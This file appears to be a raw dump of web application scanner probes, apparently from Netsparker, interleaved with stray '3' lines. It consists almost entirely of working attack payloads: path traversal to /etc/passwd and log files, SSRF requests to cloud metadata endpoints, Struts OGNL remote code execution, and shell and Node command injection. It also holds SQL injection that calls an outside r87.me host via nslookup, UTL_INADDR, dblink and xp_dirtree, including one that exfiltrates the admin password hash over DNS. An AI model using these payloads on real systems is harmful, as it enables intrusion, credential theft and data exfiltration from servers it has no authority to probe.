3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

/../../../../../../../../../../var/log/apache/access.log

3

../../../../../../../../../../xampp/apache/logs/access.log

3

/../../../../../../../../../../AppServ/Apache24/logs/access.log

3

/../../../../../../../../../../var/log/lighttpd/access.log

3

/../../../../../../../../../../opt/lampp/logs/access_log

3

/../../../../../../../../../../var/log/nginx/access.log

3

/../../../../../../../../../../etc/httpd/logs/access.log

3

/../../../../../../../../../../var/log/apache2/access.log

3

/../../../../../../../../../../WEB-INF/web.xml

3

WEB-INF/web.xml

3

/Admin/Video_Gallery.aspx

3

Video_Gallery.aspx

3

Video_Gallery.aspx

3

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

3

/etc/passwd

3

/../../../../../../../../../../../etc/passwd

3

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd

3

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd

3

....//....//....//....//....//....//....//....//....//....//....//etc/passwd

3

...//...//...//...//...//...//...//...//...//...//...//etc/passwd

3

/../../../../../../../../../../../etc/passwd.aspx

3

/../../../../../../../../../../../etc/passwd

3

file:///etc/passwd

3

/../../../../../../../../../../../etc/passwd

3

/../../../../../../../../../../proc/version.aspx

3

/../../../../../../../../../../proc/version

3

/../../../../../../../../../../var/log/apache/error.log

3

/../../../../../../../../../../var/log/apache2/error.log

3

3

/../../../../../../../../../../etc/httpd/logs/error_log

3

/../../../../../../../../../../etc/httpd/logs/error.log

3

/../../../../../../../../../../proc/self/fd/2.aspx

3

/../../../../../../../../../../proc/self/fd/2

3

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini

3

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini

3

....//....//....//....//....//....//....//....//....//....//....//windows/win.ini

3

...//...//...//...//...//...//...//...//...//...//...//windows/win.ini

3

c:\windows\win.ini

3

/../../../../../../../../../../windows/win.ini.aspx

3

file:///windows/win.ini

3

/../../../../../../../../../../windows/win.ini

3

c%3a%5cboot.ini

3

file%3a%2f%2f%2fboot.ini

3

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

3

ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................

3

c:\boot.ini

3

file:///boot.ini

3

/../../../../../../../../../../boot.ini

3

/../../../../../../../../../../boot.ini.aspx

3

/../../../../../../../../../../boot.ini

3

/../../../../../../../../../../var/log/apache/access.log

../../../../../../../../../../xampp/apache/logs/access.log

/../../../../../../../../../../AppServ/Apache24/logs/access.log

/../../../../../../../../../../var/log/lighttpd/access.log

/../../../../../../../../../../opt/lampp/logs/access_log

/../../../../../../../../../../var/log/nginx/access.log

/../../../../../../../../../../etc/httpd/logs/access.log

/../../../../../../../../../../var/log/apache2/access.log

/../../../../../../../../../../WEB-INF/web.xml

WEB-INF/web.xml

/Admin/Video_Gallery.aspx

Video_Gallery.aspx

Video_Gallery.aspx

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

/etc/passwd

3/../../../../../../../../../../../etc/passwd

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd

....//....//....//....//....//....//....//....//....//....//....//etc/passwd

...//...//...//...//...//...//...//...//...//...//...//etc/passwd

/../../../../../../../../../../../etc/passwd.aspx

/../../../../../../../../../../../etc/passwd

file:///etc/passwd

/../../../../../../../../../../../etc/passwd

/../../../../../../../../../../proc/version.aspx

/../../../../../../../../../../proc/version

/../../../../../../../../../../var/log/apache/error.log

/../../../../../../../../../../var/log/apache2/error.log

/../../../../../../../../../../etc/httpd/logs/error_log

/../../../../../../../../../../etc/httpd/logs/error.log

/../../../../../../../../../../proc/self/fd/2.aspx

/../../../../../../../../../../proc/self/fd/2

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini

....//....//....//....//....//....//....//....//....//....//....//windows/win.ini

...//...//...//...//...//...//...//...//...//...//...//windows/win.ini

c:\windows\win.ini

/../../../../../../../../../../windows/win.ini.aspx

https://metadata.packet.net/metadata

3

file:///windows/win.ini

http://169.254.169.254/opc/v1/instance

3

/../../../../../../../../../../windows/win.ini

http://bstbpc.gov.in/server-status

3

c%3a%5cboot.ini

http://[::1]:3306

3

file%3a%2f%2f%2fboot.ini

http://107.180.34.104:3306

3

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................

http://127.0.0.1:3306

3

c:\boot.ini

http://[::1]:22

3

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."buecztdbraecis78wj2c5of0qc8p991_jvafljfw""kh4.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

3

|nslookup${IFS}"buecztdbra4kexyh_ibbgctigzx-cm06jv6eszsq""pwi.r87.me"

3

http://107.180.34.104:22

3

file:///boot.ini

"&nslookup "buecztdbra0l15e-urzavlbrnke9ihdc6iwxx8nz""c7i.r87.me"

3

'&nslookup "buecztdbrawej3omukhkispmh4k-9icnscyeum7u""bau.r87.me"

3

3/../../../../../../../../../../boot.ini

http://127.0.0.1:22

3

/../../../../../../../../../../boot.ini.aspx

&nslookup "buecztdbra3_04ud6tyiofcz7zs6s_5ujsskvpfd""j-8.r87.me"

3

nslookup "buecztdbraueti5sj5h9xzwdiz21dujmtb2x63hr""py4.r87.me"

3

http://169.254.169.254/latest/meta-data/public-hostname

3

/../../../../../../../../../../boot.ini

"& nslookup buecztdbra8xyofb52sqmhiwtfsc0b5c-cysxbq1^v_i.r87.me&'\"`0&nslookup buecztdbra8xyofb52sqmhiwtfsc0b5c-cysxbq1^v_i.r87.me&`'

3

http://aws.r87.me/latest/meta-data/public-hostname

3

3

'& nslookup buecztdbrax5olnsmt0918_e0daiuimvel8vri9m^lp0.r87.me&'\"`0&nslookup buecztdbrax5olnsmt0918_e0daiuimvel8vri9m^lp0.r87.me&`'

3

https://metadata.packet.net/metadata

& nslookup buecztdbraqqmn8qihtjxym0anszxyzgugjrp32m^drk.r87.me&'\"`0&nslookup buecztdbraqqmn8qihtjxym0anszxyzgugjrp32m^drk.r87.me&`'

3

3

nslookup buecztdbrarkinvcniz4sxbtedz95daaegupuzkm^cnm.r87.me&'\"`0&nslookup buecztdbrarkinvcniz4sxbtedz95daaegupuzkm^cnm.r87.me&`'

3

http://169.254.169.254/opc/v1/instance

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."buecztdbraakoyujki_y5mgptu4uomkmefaeyima""6z8.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

3

|nslookup${IFS}"buecztdbraqoe3ueacfuxdz7egkknd8rhy7tdevl""1r4.r87.me"

http://bstbpc.gov.in/server-status

"&nslookup "buecztdbrank4_ne9ylzks-ytukmwqhvaimrad5y""m6w.r87.me"

3

'&nslookup "buecztdbratpajtm-mv4qoljlkhxxkpiky-gbnlg""yty.r87.me"

http://[::1]:3306

&nslookup "buecztdbraejjejnd29urihwl0wserulkx78fksk""vjs.r87.me"

3

nslookup "buecztdbrat8aqnm97h6rsovi5ig8cc2_b4jktgg""rn8.r87.me"

http://107.180.34.104:3306

"& nslookup buecztdbravgnytlarssdl5p4qyaopjfy2pltdnn^jf8.r87.me&'\"`0&nslookup buecztdbravgnytlarssdl5p4qyaopjfy2pltdnn^jf8.r87.me&`'

3

'& nslookup buecztdbraqjzyihg-qsobbhdjr96p6zurpotya8^hlk.r87.me&'\"`0&nslookup buecztdbraqjzyihg-qsobbhdjr96p6zurpotya8^hlk.r87.me&`'

http://127.0.0.1:3306

& nslookup buecztdbrabpblq2dfilo650cpdul5kjvevrlqma^ffc.r87.me&'\"`0&nslookup buecztdbrabpblq2dfilo650cpdul5kjvevrlqma^ffc.r87.me&`'

3

http://[::1]:22

nslookup buecztdbragmzboatcj07pvp5cigcw1kao66_huz^q-4.r87.me&'\"`0&nslookup buecztdbragmzboatcj07pvp5cigcw1kao66_huz^q-4.r87.me&`'

3

';l=document.createElement("link");l.rel="prefetch";l.href="//buecztdbrael4c3jbgewsrv9cn3p0umcbcdo_j19"+"pie.r87.me/r/?"+location.href;document.head.appendChild(l);//

3

http://107.180.34.104:22

";l=document.createElement("link");l.rel="prefetch";l.href="//buecztdbraxfrjv4unubxsqes_qyzilr1ar1hi7j"+"l1m.r87.me/r/?"+location.href;document.head.appendChild(l);//

3

3

3

http://127.0.0.1:22

3

3

3

http://169.254.169.254/latest/meta-data/public-hostname

3

3

http://aws.r87.me/latest/meta-data/public-hostname

3

3

'"-->

3

3

3

3

';l=document.createElement("link");l.rel="prefetch";l.href="//buecztdbra-jcncffswr8c7qnnhjjdapz_q9rgz1"+"olm.r87.me/r/?"+location.href;document.head.appendChild(l);//

3

3

";l=document.createElement("link");l.rel="prefetch";l.href="//buecztdbraasmu_zevdjn0u-dpluwmnlt0i2zrid"+"guk.r87.me/r/?"+location.href;document.head.appendChild(l);//

3

3

3

3

3

3

3

3

3

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(95)||chr(103)||chr(53)||chr(57)||chr(97)||chr(118)||chr(105)||chr(51)||chr(99)||chr(108)||chr(56)||chr(56)||chr(114)||chr(119)||chr(54)||chr(105)||chr(57)||chr(102)||chr(48)||chr(109)||chr(104)||chr(120)||chr(101)||chr(97)||chr(111)||chr(104)||chr(99)||chr(118)||chr(99)||chr(104)||chr(99)||chr(53)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'

3

3

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(120)||chr(117)||chr(108)||chr(108)||chr(99)||chr(111)||chr(99)||chr(52)||chr(104)||chr(119)||chr(114)||chr(56)||chr(103)||chr(100)||chr(120)||chr(115)||chr(102)||chr(99)||chr(106)||chr(121)||chr(106)||chr(113)||chr(51)||chr(116)||chr(117)||chr(99)||chr(101)||chr(105)||chr(116)||chr(120)||chr(103)||chr(99)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))

3

(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(99)||chr(107)||chr(103)||chr(99)||chr(97)||chr(56)||chr(104)||chr(111)||chr(116)||chr(116)||chr(99)||chr(113)||chr(56)||chr(98)||chr(111)||chr(52)||chr(113)||chr(45)||chr(115)||chr(114)||chr(106)||chr(98)||chr(103)||chr(105)||chr(111)||chr(98)||chr(49)||chr(106)||chr(120)||chr(103)||chr(117)||chr(99)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

3

3

'"-->

3

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbrakgy37cxbiytabwtuh0modjfms-sinc'||'ey0.r87.me') from DUAL))||'

3

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbranjgvvpjaztkhzqozkmuqlrql4xk5q3'||'3nm.r87.me') from DUAL))))

3

(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbra323q4ebl7y7hgh-pvcxgxeih-s6xqy'||'tqe.r87.me') from DUAL)

3

'||(SELECT dblink_connect('host=buecztdbraaotafloqzkqlsnwanohamy0yb0-wvr'||'xpy.r87.me user=a password=a connect_timeout=2'))||'

3

cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(120)||chr(101)||chr(109)||chr(102)||chr(98)||chr(104)||chr(57)||chr(109)||chr(55)||chr(119)||chr(99)||chr(116)||chr(110)||chr(99)||chr(109)||chr(115)||chr(122)||chr(48)||chr(119)||chr(115)||chr(121)||chr(103)||chr(52)||chr(100)||chr(105)||chr(55)||chr(56)||chr(105)||chr(101)||chr(121)||chr(112)||chr(102)||chr(109)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)

3

cast((SELECT dblink_connect('host=buecztdbraaztkrabpcnw9evbw37blsfpmulsgn7'||'gnk.r87.me user=a password=a connect_timeout=2')) as numeric)

3

3

dblink_connect('host=buecztdbram7psiamzwi8_povclb_abcwgq2phxi'||'2ea.r87.me user=a password=a connect_timeout=2')

3

3

3

3

SELECT dblink_connect('host=buecztdbrac8_4y-kczzpwvcen1vbvcvsbak8sql'||'seo.r87.me user=a password=a connect_timeout=2')

3

-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbra0jqrmmzjrvvc6vptgfkzdyomzafopl'+'zzq.r87.me')exec sp_executesql @r--

3

1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbraly6b9nazhgluj-ljqagbxh8ohulmyn'+'ok0.r87.me')exec sp_executesql @r--

3

3

DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbraqx4tik8kwpwiqpexzxnal5k0cphhvz'+'1jw.r87.me')exec sp_executesql @r

3

syscolumns WHERE 2>3;exec('xp_dirtree ''\\buecztdbran2r9v1aiitn12w8minp5igsmwrgzg_'+'hcg.r87.me'+'\c$\a''')--

3

3

1'))exec('xp_dirtree ''\\buecztdbrawutjwmfpe6wnadgjcwewcamhf9mu99'+'k0e.r87.me'+'\c$\a''')--

3

3

1))exec('xp_dirtree ''\\buecztdbran6gijepwdybbof77mf_izhpwtg0gh4'+'3gk.r87.me'+'\c$\a''')--

3

1')exec('xp_dirtree ''\\buecztdbracqk004qzczld7u7o6rmixlr-83edfg'+'mpq.r87.me'+'\c$\a''')--

3

3

3

1) exec('xp_dirtree ''\\buecztdbrakuhu39qh_941hpspbw5lzlnmfehuqw'+'8bw.r87.me'+'\c$\a''')--

3

-1';exec('xp_dirtree ''\\buecztdbra9psgbxay4b50pytmtfvsqch4ynjhjw'+'1mc.r87.me'+'\c$\a''')--

3

3

1;exec('xp_dirtree ''\\buecztdbras_1t3si2-cfdlhabywplocyhzwqkc-'+'ats.r87.me'+'\c$\a''')--

3

declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.buecztdbrawvnnmajttlc-jnz04uetrotpsxfsv8'+'hv8.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')

3

exec('xp_dirtree ''\\buecztdbray8paigxh0d0pqcvlorvhupsu6ledoh'+'rv0.r87.me'+'\c$\a''')

3

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(45)||chr(103)||chr(120)||chr(110)||chr(103)||chr(99)||chr(102)||chr(114)||chr(119)||chr(117)||chr(103)||chr(114)||chr(45)||chr(118)||chr(104)||chr(97)||chr(121)||chr(48)||chr(119)||chr(100)||chr(49)||chr(98)||chr(104)||chr(100)||chr(117)||chr(53)||chr(115)||chr(48)||chr(110)||chr(48)||chr(121)||chr(114)||chr(107)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'

3

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(107)||chr(107)||chr(48)||chr(109)||chr(113)||chr(117)||chr(113)||chr(107)||chr(98)||chr(101)||chr(118)||chr(52)||chr(54)||chr(56)||chr(120)||chr(114)||chr(55)||chr(100)||chr(57)||chr(112)||chr(48)||chr(115)||chr(112)||chr(104)||chr(116)||chr(114)||chr(121)||chr(115)||chr(117)||chr(101)||chr(110)||chr(119)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))

(select UTL_INADDR.GET_HOST_ADDRESS(chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(122)||chr(56)||chr(48)||chr(112)||chr(112)||chr(53)||chr(121)||chr(104)||chr(99)||chr(120)||chr(106)||chr(120)||chr(107)||chr(48)||chr(112)||chr(119)||chr(51)||chr(101)||chr(101)||chr(50)||chr(48)||chr(116)||chr(107)||chr(114)||chr(111)||chr(56)||chr(109)||chr(105)||chr(108)||chr(112)||chr(118)||chr(119)||chr(103)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

3

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbrarwfjbxvv94qhnc6xxhgebcvmw4p7bx'||'jay.r87.me') from DUAL))||'

3

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbragobmt9brkpb-6ajlj48rantdvaldff'||'0x4.r87.me') from DUAL))))

(select UTL_INADDR.GET_HOST_ADDRESS('buecztdbraylpf9kyxkgq4ynniuotiaxzyl5ywyb'||'30a.r87.me') from DUAL)

3

3

'||(SELECT dblink_connect('host=buecztdbrawgacxnwzir_wrjpjylwxb7romwpmcp'||'np4.r87.me user=a password=a connect_timeout=2'))||'

cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(98)||chr(117)||chr(101)||chr(99)||chr(122)||chr(116)||chr(100)||chr(98)||chr(114)||chr(97)||chr(102)||chr(119)||chr(57)||chr(99)||chr(102)||chr(100)||chr(106)||chr(101)||chr(105)||chr(118)||chr(122)||chr(120)||chr(101)||chr(122)||chr(114)||chr(100)||chr(120)||chr(121)||chr(111)||chr(120)||chr(45)||chr(109)||chr(107)||chr(102)||chr(116)||chr(115)||chr(45)||chr(112)||chr(111)||chr(106)||chr(120)||chr(122)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)

cast((SELECT dblink_connect('host=buecztdbralgb-aomubwpuuebwhnidvr5s4jprky'||'rmq.r87.me user=a password=a connect_timeout=2')) as numeric)

dblink_connect('host=buecztdbradd8qsvbl7ajkbxmgx-sii1tjgm8rg6'||'omm.r87.me user=a password=a connect_timeout=2')

SELECT dblink_connect('host=buecztdbra1kqdn73lludjjq5csihtnqat8w3n-z'||'hrg.r87.me user=a password=a connect_timeout=2')

3

3

-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbragwq-e6bjgdcya_nvhokqqy8lz24o8_'+'gbc.r87.me')exec sp_executesql @r--

3

1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbra6sdydnvo0nywkfaxumxpyqzssgixpf'+'d4y.r87.me')exec sp_executesql @r--

DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','buecztdbra0pyrwpatmosrsp3dr3i_vn_c3pv1v0'+'cdk.r87.me')exec sp_executesql @r

3

syscolumns WHERE 2>3;exec('xp_dirtree ''\\buecztdbrazbg1-bw8ewkohozhdotcvinlihnuqv'+'ipc.r87.me'+'\c$\a''')--

1'))exec('xp_dirtree ''\\buecztdbrauux7yqcoe15p0bt4iqvk5dqlgpblos'+'oa8.r87.me'+'\c$\a''')--

1))exec('xp_dirtree ''\\buecztdbraagx_rzptt-eptfsjmsevh4c2chnyap'+'dze.r87.me'+'\c$\a''')--

3

1')exec('xp_dirtree ''\\buecztdbrav_brscupvwhtocevoogl6jnd08jlxs'+'nva.r87.me'+'\c$\a''')--

3

3

1) exec('xp_dirtree ''\\buecztdbram43jsivnre8prtm8b-rzw2xt0yxusy'+'qrm.r87.me'+'\c$\a''')--

-1';exec('xp_dirtree ''\\buecztdbrafunvj8gn1ftvdqbzds65edzd2gmv8d'+'pvo.r87.me'+'\c$\a''')--

3

1;exec('xp_dirtree ''\\buecztdbra4cpsq3zvo7hxjutqz9q7y1dmlntytc'+'sry.r87.me'+'\c$\a''')--

3

declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.buecztdbrahll0khbiciepyl7ogbglswm7drjyee'+'l3e.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')

3

exec('xp_dirtree ''\\buecztdbra-2vdnxmycr88iqhrfb3miksfamc3mt'+'dzm.r87.me'+'\c$\a''')

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

3

http://r87.me/r/?id=buecztdbra92oyuvyixpvc5fc3z6aiz2ehem-wcpacq

3

3

3

3

3

3

3

//buecztdbra-0iu9jexgvypjyk2ifwdrymvbotzzy8pk.r87.me

3

3

3

3

3

3

buecztdbra6onjk1_e8scbxd9vvo1lizlyp7l23fcoo.r87.me

3

3

3

3

3

3

3

3

http://r87.me/r/?id=buecztdbrajsai7rm5b_6g1w7ug8nebxgdx1bwck1rg

3

%dtd;]>&a;

3

3

%dtd;]>&a;

3

3

3

//buecztdbrawwd4648dqsbx_byyibuyhxx5ldua4jwwi.r87.me

3

3

3

3

3

3

3

buecztdbrakrrzp5jiccnb_isykqeqrwv1f4jefxcjm.r87.me

3

3

3

&thisdoesntexists;

3

3

3

3

3

3

3

]>&lfi;

3

3

3

3

3

3

3

3

]>&lfi;

3

3

3

3

3

|expr${IFS}268409241${IFS}-${IFS}91197

3

3

&thisdoesntexists;

3

3

3

|expr${IFS}268409241${IFS}-${IFS}91720

3

]>&lfi;

3

3

3

]>&lfi;

3

3

3

NS09＜s1﹥DBLʺSNGLʹNS09

3

3

3

expr 268409241 - 65321

3

3

NS09＜s1﹥DBLʺSNGLʹNS09

3

3

expr 268409241 - 71420

3

3

expr 268409241 - 34970;

3

3

3

3

expr 268409241 - 55041;

3

3

3

3

3

3

3

;expr 268409241 - 85288;x

3

;expr 268409241 - 42594;x

3

3

3

3

';expr 268409241 - 91618;'

3

N3tSp4rK3R

3

';expr 268409241 - 30379;'

3

%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-86652)}

3

3

";expr 268409241 - 76152;"

3

3

N3tSp4rK3R

%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-16760)}

3

";expr 268409241 - 19934;"

3

3

arguments[1].end(require('child_process').execSync('set /A 268409241 - 89738'))

3

3

arguments[1].end(require('child_process').execSync('set /A 268409241 - 26934'))

3

| SET /A 0xFFF9999-60271

3

3

3

arguments[1].end(require('child_process').execSync('expr 268409241 - 98532'))

3

ns:netsparker056650=vuln

3

| SET /A 0xFFF9999-43862

3

arguments[1].end(require('child_process').execSync('expr 268409241 - 54395'))

3

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='88219').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

3

3

3

SET /A 0xFFF9999-9419

3

%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-22747)}

ns:netsparker056650=vuln

3

SET /A 0xFFF9999-50894

3

3

%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-98486)}

3

http://example.com/? ns: netsparker056650=vuln

3

SET /A 0xFFF9999-17295 &

3

3

arguments[1].end(require('child_process').execSync('set /A 268409241 - 22098'))

3

SET /A 0xFFF9999-40070 &

3

ns:netsparker056650=vuln

3

arguments[1].end(require('child_process').execSync('set /A 268409241 - 49824'))

3

& SET /A 0xFFF9999-29530 &

3

ns:netsparker056650=vuln

& SET /A 0xFFF9999-27905 &

3

arguments[1].end(require('child_process').execSync('expr 268409241 - 76734'))

3

'& SET /A 0xFFF9999-36160 &

3

arguments[1].end(require('child_process').execSync('expr 268409241 - 40741'))

ns:netsparker056650=vuln

3

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='24699').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

3

'& SET /A 0xFFF9999-40775 &

3

3

http://example.com/? ns: netsparker056650=vuln

"& SET /A 0xFFF9999-11462 &

3

ns:netsparker056650=vuln

"& SET /A 0xFFF9999-14108 &

3

3

|expr${IFS}268409241${IFS}-${IFS}80307

3

3

|expr${IFS}268409241${IFS}-${IFS}97869

3

3

3

3

3

3

expr 268409241 - 51270

3

3

3

3

expr 268409241 - 45433

expr 268409241 - 67046;

3

3

3

expr 268409241 - 76074;

3

3

3

3

3;expr 268409241 - 71274;x

3

3

3

3;expr 268409241 - 20167;x

3

3

3

3

3';expr 268409241 - 49753;'

3

r87.com/n

3

3

3';expr 268409241 - 4817;'

3

http://r87.com/n?.aspx

3

http://r87.com/n?.aspx

3

3

3";expr 268409241 - 63791;"

hTTp://r87.com/n

3

3";expr 268409241 - 25797;"

3

r87.com/n

| SET /A 0xFFF9999-34439

3

